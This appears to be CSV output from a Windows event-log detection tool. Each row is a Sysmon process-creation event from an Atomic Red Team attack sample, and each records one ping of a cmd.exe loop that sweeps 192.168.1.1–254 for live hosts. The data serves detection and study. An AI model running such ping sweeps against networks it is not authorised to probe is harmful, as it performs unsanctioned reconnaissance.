+2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.191  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.192  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.193  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.194  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.195  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.196  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.197  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.198  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.199  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.200  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.201  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.202  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.203  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.204  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.205  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.206  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.207  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.208  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.209  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.210  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.211  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.212  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.213  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.214  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.215  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.216  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.217  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.218  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.219  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.220  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.221  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.222  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.223  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.224  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.225  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.226  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.227  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.228  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.229  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.230  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.231  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.232  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.233  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.234  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.235  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.236  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.237  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.238  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.239  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.240  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.241  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.242  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.243  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.244  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
